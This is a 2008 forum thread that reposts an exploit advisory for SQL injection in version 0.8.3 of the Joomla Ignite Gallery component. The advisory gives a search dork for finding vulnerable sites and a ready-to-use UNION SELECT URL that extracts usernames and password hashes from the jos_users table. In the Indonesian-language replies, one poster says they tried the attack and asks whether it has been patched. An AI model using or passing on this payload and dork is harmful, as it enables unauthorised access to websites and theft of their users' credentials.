Posted by EVA-00 on 11-10-2008 03:19
#1
#############################################################################
# #
# Joomla Component Ignite Gallery SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]
########################################
[~] ScriptName: "Joomla"
[~] Component: "Ignite Gallery (com_ignitegallery)"
[~] Version: "0.8.3"
[~] Author: "Matt Thomson"
[~] Author E-mail: "matt@ignitejoomlaextensions.com"
[~] Author URL: "www.ignitejoomlaextensions.com"
########################################
[~] DORK: inurl:"com_ignitegallery"
########################################
[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania
########################################
# milw0rm.com [2008-10-10]
Posted by sanca on 22-11-2008 11:13
#6
EVA-00 wrote:
Bug diatas sangat berbahaya, karna attacker bisa melihat username dan password administrator dalam bentuk md5 hash.
Ko gk bisa ya...??
Pas saya praktekin, ko galery nya malah blank item.
disana tercantum tulisan yang hidden gitu. pas kita blok baru ketauan tulisan nya. tapi bukan username and password tuh.
apa emang udah di patch ya?